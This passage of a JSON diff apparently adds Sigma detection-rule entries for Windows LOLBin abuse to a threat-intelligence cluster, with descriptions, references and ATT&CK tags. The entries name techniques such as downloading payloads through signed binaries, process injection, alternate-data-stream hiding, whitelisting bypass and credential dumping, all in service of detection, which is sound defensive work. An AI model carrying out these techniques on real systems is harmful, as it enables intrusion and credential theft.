"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_diantz_ads.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1564.004" + ], + "creation_date": "2021/11/26", + "filename": "proc_creation_win_lolbin_diantz_ads.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Very Possible" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Download and compress a remote file and store it in a cab file on local machine.", + "uuid": "185d7418-f250-42d0-b72e-0c8b70661e93", + "value": "Suspicious Diantz Download and Compress Into a CAB File", + "meta": { + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Diantz/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_diantz_remote_cab.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1105" + ], + "creation_date": "2021/11/26", + "filename": "proc_creation_win_lolbin_diantz_remote_cab.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the execution of Xwizard tool from the non-default directory which can be used to sideload a custom xwizards.dll", + "uuid": "193d5ccd-6f59-40c6-b5b0-8e32d5ddd3d1", + "value": "Xwizard DLL Sideloading", + "meta": { + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Xwizard/", + "http://www.hexacorn.com/blog/2017/07/31/the-wizard-of-x-oppa-plugx-style/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_dll_sideload_xwizard.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1574.002" + ], + "creation_date": "2021/09/20", + "filename": "proc_creation_win_lolbin_dll_sideload_xwizard.yml", + "author": "Christian Burkard", + "level": "high", + "falsepositive": [ + "Windows installed on non-C drive" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects when a user bypasses Defender by renaming a tool to dump64.exe and placing it in a Visual Studio folder", + "uuid": "129966c9-de17-4334-a123-8b58172e664d", + "value": "Suspicious Dump64.exe Execution", + "meta": { + "refs": [ + "https://twitter.com/mrd0x/status/1460597833917251595", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_dump64.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.001" + ], + "creation_date": "2021/11/26", + "filename": "proc_creation_win_lolbin_dump64.yml", + "author": "Austin Songer @austinsonger, Florian Roth", + "level": "high", + "falsepositive": [ + "Dump64.exe in other folders than the excluded one" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Adversaries can abuse winget to download payloads remotely and execute them without touching disk. Winget will be included by default in Windows 10 and is already available in Windows 10 insider programs. The manifest option enables you to install an application by passing in a YAML file directly to the client. Winget can be used to download and install exe's, msi, msix files later.", + "uuid": "313d6012-51a0-4d93-8dfc-de8553239e25", + "value": "Monitoring Winget For LOLbin Execution", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/windows/package-manager/winget/install#local-install", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_execution_via_winget.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.execution", + "attack.t1059" + ], + "creation_date": "2020/04/21", + "filename": "proc_creation_win_lolbin_execution_via_winget.yml", + "author": "Sreeman, Florian Roth, Frack113", + "level": "medium", + "falsepositive": [ + "Admin activity installing packages not in the official Microsoft repo. Winget probably won't be used by most users." + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Extexport.exe loads dll and is execute from other folder the original path", + "uuid": "fb0b815b-f5f6-4f50-970f-ffe21f253f7a", + "value": "Suspicious Extexport Execution", + "meta": { + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Extexport/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_extexport.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218" + ], + "creation_date": "2021/11/26", + "filename": "proc_creation_win_lolbin_extexport.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Download or Copy file with Extrac32", + "uuid": "aa8e035d-7be4-48d3-a944-102aec04400d", + "value": "Suspicious Extrac32 Execution", + "meta": { + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Extrac32/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_extrac32.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1105" + ], + "creation_date": "2021/11/26", + "filename": "proc_creation_win_lolbin_extrac32.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Extract data from cab file and hide it in an alternate data stream", + "uuid": "4b13db67-0c45-40f1-aba8-66a1a7198a1e", + "value": "Suspicious Extrac32 Alternate Data Stream Execution", + "meta": { + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Extrac32/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_extrac32_ads.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1564.004" + ], + "creation_date": "2021/11/26", + "filename": "proc_creation_win_lolbin_extrac32_ads.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Attackers can use findstr to hide their artifacts or search specific strings and evade defense mechanism", + "uuid": "bf6c39fc-e203-45b9-9538-05397c1b4f3f", + "value": "Abusing Findstr for Defense Evasion", + "meta": { + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Findstr/", + "https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/", + "https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_findstr.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218", + "attack.t1564.004", + "attack.t1552.001", + "attack.t1105" + ], + "creation_date": "2020/10/05", + "filename": "proc_creation_win_lolbin_findstr.yml", + "author": "Furkan CALISKAN, @caliskanfurkan_, @oscd_initiative, Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "Administrative findstr usage" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Execute commands and binaries from the context of \"forfiles\". This is used as a LOLBIN for example to bypass application whitelisting.", + "uuid": "9aa5106d-bce3-4b13-86df-3a20f1d5cf0b", + "value": "Use of Forfiles For Execution", + "meta": { + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Forfiles/", + "https://pentestlab.blog/2020/07/06/indirect-command-execution/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_forfiles.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059" + ], + "creation_date": "2022/06/14", + "filename": "proc_creation_win_lolbin_forfiles.yml", + "author": "Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "Legitimate use by a via a batch script or by an administrator." + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "The FSharp Interpreters, FsiAnyCpu.exe and FSi.exe, can be used for AWL bypass and is listed in Microsoft recommended block rules.", + "uuid": "b96b2031-7c17-4473-afe7-a30ce714db29", + "value": "Use of FSharp Interpreters", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules", + "https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/", + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/FsiAnyCpu/", + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Fsi/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_fsharp_interpreters.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059" + ], + "creation_date": "2022/06/02", + "filename": "proc_creation_win_lolbin_fsharp_interpreters.yml", + "author": "Christopher Peacock @SecurePeacock, SCYTHE @scythe_io", + "level": "medium", + "falsepositive": [ + "Legitimate use by a software developer." + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects execution of ftp.exe script execution with the \"-s\" flag and any child processes ran by ftp.exe", + "uuid": "06b401f4-107c-4ff9-947f-9ec1e7649f1e", + "value": "LOLBIN Execution Of The FTP.EXE Binary", + "meta": { + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Ftp/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_ftp.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059", + "attack.defense_evasion", + "attack.t1202" + ], + "creation_date": "2020/10/09", + "filename": "proc_creation_win_lolbin_ftp.yml", + "author": "Victor Sergeev, oscd.community", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the execution of the LOLBIN gpscript, which executes logon or startup scripts configured in Group Policy", + "uuid": "1e59c230-6670-45bf-83b0-98903780607e", + "value": "Gpscript Execution", + "meta": { + "refs": [ + "https://oddvar.moe/2018/04/27/gpscript-exe-another-lolbin-to-the-list/", + "https://lolbas-project.github.io/lolbas/Binaries/Gpscript/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_gpscript.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218" + ], + "creation_date": "2022/05/16", + "filename": "proc_creation_win_lolbin_gpscript.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Legitimate uses of logon scripts distributed via group policy" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detect use of ie4uinit.exe to execute commands from a specially prepared ie4uinit.inf file from a directory other than the usual directories", + "uuid": "d3bf399f-b0cf-4250-8bb4-dfc192ab81dc", + "value": "Ie4uinit Lolbin Use From Invalid Path", + "meta": { + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Ie4uinit/", + "https://bohops.com/2018/03/10/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence-part-2/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_ie4uinit.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218" + ], + "creation_date": "2022/05/07", + "filename": "proc_creation_win_lolbin_ie4uinit.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects execution of the IEExec utility to download payloads", + "uuid": "9801abb8-e297-4dbf-9fbd-57dde0e830ad", + "value": "Abusing IEExec To Download Payloads", + "meta": { + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Ieexec/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_ieexec_download.yml" + ], + "tags": "No established tags", + "creation_date": "2022/05/16", + "filename": "proc_creation_win_lolbin_ieexec_download.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detect use of Ilasm.exe to compile c# code into dll or exe.", + "uuid": "850d55f9-6eeb-4492-ad69-a72338f65ba4", + "value": "Ilasm Lolbin Use Compile C-Sharp", + "meta": { + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Ilasm/", + "https://www.echotrail.io/insights/search/ilasm.exe", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_ilasm.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1127" + ], + "creation_date": "2022/05/07", + "filename": "proc_creation_win_lolbin_ilasm.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the use the .NET InstallUtil.exe application in order to download arbitrary files. The files will be written to %LOCALAPPDATA%\\Microsoft\\Windows\\INetCache\\IE\\", + "uuid": "75edd216-1939-4c73-8d61-7f3a0d85b5cc", + "value": "Suspicious Execution of InstallUtil To Download", + "meta": { + "refs": [ + "https://github.com/LOLBAS-Project/LOLBAS/pull/239", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_installutil_download.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218" + ], + "creation_date": "2022/08/19", + "filename": "proc_creation_win_lolbin_installutil_download.yml", + "author": "Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the execution of the LOLBIN jsc.exe used by .NET to compile javascript code to .exe or .dll format", + "uuid": "52788a70-f1da-40dd-8fbd-73b5865d6568", + "value": "JSC Convert Javascript To Executable", + "meta": { + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Jsc/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_jsc.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1127" + ], + "creation_date": "2022/05/02", + "filename": "proc_creation_win_lolbin_jsc.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the execution of a signed binary dropped by Kaspersky Lab Products Remover (kavremover) which can be abused as a LOLBIN to execute arbitrary commands and binaries.", + "uuid": "d047726b-c71c-4048-a99b-2e2f50dc107d", + "value": "Kavremover Dropped Binary LOLBIN Usage", + "meta": { + "refs": [ + "https://nasbench.medium.com/lolbined-using-kaspersky-endpoint-security-kes-installer-to-execute-arbitrary-commands-1c999f1b7fea", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_kavremover.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1127" + ], + "creation_date": "2022/11/01", + "filename": "proc_creation_win_lolbin_kavremover.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the use of the 'Launch-VsDevShell.ps1' Microsoft signed script to execute commands.", + "uuid": "45d3a03d-f441-458c-8883-df101a3bb146", + "value": "Launch-VsDevShell.PS1 Proxy Execution", + "meta": { + "refs": [ + "https://twitter.com/nas_bench/status/1535981653239255040", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_launch_vsdevshell.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1216.001" + ], + "creation_date": "2022/08/19", + "filename": "proc_creation_win_lolbin_launch_vsdevshell.yml", + "author": "Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "Legitimate usage of the script by a developer" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects process injection using the signed Windows tool \"Mavinject\" via the \"INJECTRUNNING\" flag", + "uuid": "4f73421b-5a0b-4bbf-a892-5a7fb99bea66", + "value": "Mavinject Inject DLL Into Running Process", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1056.004/T1056.004.md", + "https://posts.specterops.io/mavinject-exe-functionality-deconstructed-c29ab2cf5c0e", + "https://twitter.com/gN3mes1s/status/941315826107510784", + "https://reaqta.com/2017/12/mavinject-microsoft-injector/", + "https://twitter.com/Hexacorn/status/776122138063409152", + "https://github.com/SigmaHQ/sigma/issues/3742", + "https://github.com/keyboardcrunch/SentinelOne-ATTACK-Queries/blob/6a228d23eefe963ca81f2d52f94b815f61ef5ee0/Tactics/DefenseEvasion.md#t1055-process-injection", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_mavinject_process_injection.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1055.001", + "attack.t1218.013" + ], + "creation_date": "2021/07/12", + "filename": "proc_creation_win_lolbin_mavinject_process_injection.yml", + "author": "frack113, Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "The \"Trace log generation tool for Media Foundation Tools\" (Mftrace.exe) can be used to execute arbitrary binaries", + "uuid": "3d48c9d3-1aa6-418d-98d3-8fd3c01a564e", + "value": "Use of Mftrace.exe", + "meta": { + "refs": [ + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Mftrace/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_mftrace.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1127" + ], + "creation_date": "2022/06/09", + "filename": "proc_creation_win_lolbin_mftrace.yml", + "author": "Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "Legitimate use for tracing purposes" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects execution of \"msdt.exe\" using an answer file which is simulating the legitimate way of calling msdt via \"pcwrun.exe\" (For example from the compatibility tab)", + "uuid": "9c8c7000-3065-44a8-a555-79bcba5d9955", + "value": "Execute MSDT Via Answer File", + "meta": { + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Msdt/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_msdt_answer_file.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218", + "attack.execution" + ], + "creation_date": "2022/06/13", + "filename": "proc_creation_win_lolbin_msdt_answer_file.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Possible undocumented parents of \"msdt\" other than \"pcwrun\"" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects usage of \"MSOHTMED\" to download arbitrary files", + "uuid": "459f2f98-397b-4a4a-9f47-6a5ec2f1c69d", + "value": "Download Arbitrary Files Via MSOHTMED.EXE", + "meta": { + "refs": [ + "https://github.com/LOLBAS-Project/LOLBAS/pull/238/files", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_msohtmed_download.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.execution", + "attack.t1218" + ], + "creation_date": "2022/08/19", + "filename": "proc_creation_win_lolbin_msohtmed_download.yml", + "author": "Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects usage of \"MSPUB\" (Microsoft Publisher) to download arbitrary files", + "uuid": "3b3c7f55-f771-4dd6-8a6e-08d057a17caf", + "value": "Download Arbitrary Files Via MSPUB.EXE", + "meta": { + "refs": [ + "https://github.com/LOLBAS-Project/LOLBAS/pull/238/files", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_mspub_download.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.execution", + "attack.t1218" + ], + "creation_date": "2022/08/19", + "filename": "proc_creation_win_lolbin_mspub_download.yml", + "author": "Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects LOLBINs executing from an abnormal drive such as a mounted ISO.", + "uuid": "d4ca7c59-e9e4-42d8-bf57-91a776efcb87", + "value": "LOLBIN From Abnormal Drive", + "meta": { + "refs": [ + "https://thedfirreport.com/2021/12/13/diavol-ransomware/", + "https://www.scythe.io/library/threat-emulation-qakbot", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_not_from_c_drive.yml" + ], + "tags": [ + "attack.t1218.001" + ], + "creation_date": "2022/01/25", + "filename": "proc_creation_win_lolbin_not_from_c_drive.yml", + "author": "Christopher Peacock '@securepeacock', SCYTHE '@scythe_io'", + "level": "medium", + "falsepositive": [ + "Rare false positives could occur on servers with multiple drives." + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Use OfflineScannerShell.exe to execute mpclient.dll library in the current working directory", + "uuid": "02b18447-ea83-4b1b-8805-714a8a34546a", + "value": "Suspicious OfflineScannerShell.exe Execution From Another Folder", + "meta": { + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/OfflineScannerShell/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_offlinescannershell.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218" + ], + "creation_date": "2022/03/06", + "filename": "proc_creation_win_lolbin_offlinescannershell.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects usage of OpenConsole binary as a LOLBIN to launch other binaries to bypass application Whitelisting", + "uuid": "814c95cc-8192-4378-a70a-f1aafd877af1", + "value": "Use of OpenConsole", + "meta": { + "refs": [ + "https://twitter.com/nas_bench/status/1537563834478645252", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_openconsole.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059" + ], + "creation_date": "2022/06/16", + "filename": "proc_creation_win_lolbin_openconsole.yml", + "author": "Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "Legitimate use by an administrator" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Execute commands and binaries from the context of The program compatibility assistant (Pcalua.exe). This is used as a LOLBIN for example to bypass application whitelisting.", + "uuid": "0955e4e1-c281-4fb9-9ee1-5ee7b4b754d2", + "value": "Use of Pcalua For Execution", + "meta": { + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Pcalua/", + "https://pentestlab.blog/2020/07/06/indirect-command-execution/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_pcalua.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059" + ], + "creation_date": "2022/06/14", + "filename": "proc_creation_win_lolbin_pcalua.yml", + "author": "Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "Legitimate use by a via a batch script or by an administrator." + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detect indirect command execution via Program Compatibility Assistant pcwrun.exe", + "uuid": "b97cd4b1-30b8-4a9d-bd72-6293928d52bc", + "value": "Indirect Command Execution By Program Compatibility Wizard", + "meta": { + "refs": [ + "https://twitter.com/pabraeken/status/991335019833708544", + "https://lolbas-project.github.io/lolbas/Binaries/Pcwrun/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_pcwrun.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218", + "attack.execution" + ], + "creation_date": "2020/10/12", + "filename": "proc_creation_win_lolbin_pcwrun.yml", + "author": "A. Sungurov , oscd.community", + "level": "low", + "falsepositive": [ + "Need to use extra processing with 'unique_count' / 'filter' to focus on outliers as opposed to commonly seen artifacts", + "Legit usage of scripts" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects indirect command execution via Program Compatibility Assistant \"pcwrun.exe\" leveraging the follina (CVE-2022-30190) vulnerability", + "uuid": "6004abd0-afa4-4557-ba90-49d172e0a299", + "value": "Execute Pcwrun.EXE To Leverage Follina", + "meta": { + "refs": [ + "https://twitter.com/nas_bench/status/1535663791362519040", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_pcwrun_follina.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218", + "attack.execution" + ], + "creation_date": "2022/06/13", + "filename": "proc_creation_win_lolbin_pcwrun_follina.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Tools to Capture Network Packets on the windows 10 with October 2018 Update or later.", + "uuid": "f956c7c1-0f60-4bc5-b7d7-b39ab3c08908", + "value": "Use of PktMon.exe", + "meta": { + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Pktmon/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_pktmon.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1040" + ], + "creation_date": "2022/03/17", + "filename": "proc_creation_win_lolbin_pktmon.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Legitimate use" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects usage of \"PresentationHost\" which is a utility that runs \".xbap\" (Browser Applications) files. It can be abused to run malicious \".xbap\" files any bypass AWL", + "uuid": "d22e2925-cfd8-463f-96f6-89cec9d9bc5f", + "value": "Application Whitelisting Bypass via PresentationHost.exe", + "meta": { + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Presentationhost/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_presentationhost.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.execution", + "attack.t1218" + ], + "creation_date": "2022/07/01", + "filename": "proc_creation_win_lolbin_presentationhost.yml", + "author": "Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "Legitimate \".xbap\" being executed via \"PresentationHost\"" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects usage of \"PresentationHost\" which is a utility that runs \".xbap\" (Browser Applications) files to download arbitrary files", + "uuid": "b124ddf4-778d-418e-907f-6dd3fc0d31cd", + "value": "Download Arbitrary Files Via PresentationHost.exe", + "meta": { + "refs": [ + "https://github.com/LOLBAS-Project/LOLBAS/pull/239/files", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_presentationhost_download.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.execution", + "attack.t1218" + ], + "creation_date": "2022/08/19", + "filename": "proc_creation_win_lolbin_presentationhost_download.yml", + "author": "Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the execution of the LOLBIN PrintBrm.exe, which can be used to create or extract ZIP files. PrintBrm.exe should not be run on a normal workstation.", + "uuid": "cafeeba3-01da-4ab4-b6c4-a31b1d9730c7", + "value": "PrintBrm ZIP Creation of Extraction", + "meta": { + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/PrintBrm/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_printbrm.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1105", + "attack.defense_evasion", + "attack.t1564.004" + ], + "creation_date": "2022/05/02", + "filename": "proc_creation_win_lolbin_printbrm.yml", + "author": "frack113", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the use of the 'Pubprn.vbs' Microsoft signed script to execute commands.", + "uuid": "1fb76ab8-fa60-4b01-bddd-71e89bf555da", + "value": "Pubprn.vbs Proxy Execution", + "meta": { + "refs": [ + "https://lolbas-project.github.io/lolbas/Scripts/Pubprn/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_pubprn.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1216.001" + ], + "creation_date": "2022/05/28", + "filename": "proc_creation_win_lolbin_pubprn.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects using Rasautou.exe for loading arbitrary .DLL specified in -d option and executes the export specified in -p.", + "uuid": "cd3d1298-eb3b-476c-ac67-12847de55813", + "value": "DLL Execution via Rasautou.exe", + "meta": { + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Rasautou/", + "https://github.com/fireeye/DueDLLigence", + "https://www.fireeye.com/blog/threat-research/2019/10/staying-hidden-on-the-endpoint-evading-detection-with-shellcode.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_rasautou_dll_execution.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218" + ], + "creation_date": "2020/10/09", + "filename": "proc_creation_win_lolbin_rasautou_dll_execution.yml", + "author": "Julia Fomina, oscd.community", + "level": "medium", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious execution of Regasm/Regsvcs utilities", + "uuid": "cc368ed0-2411-45dc-a222-510ace303cb2", + "value": "Regasm/Regsvcs Suspicious Execution", + "meta": { + "refs": [ + "https://www.fortiguard.com/threat-signal-report/4718?s=09", + "https://lolbas-project.github.io/lolbas/Binaries/Regasm/", + "https://lolbas-project.github.io/lolbas/Binaries/Regsvcs/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_regasm.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218.009" + ], + "creation_date": "2022/08/25", + "filename": 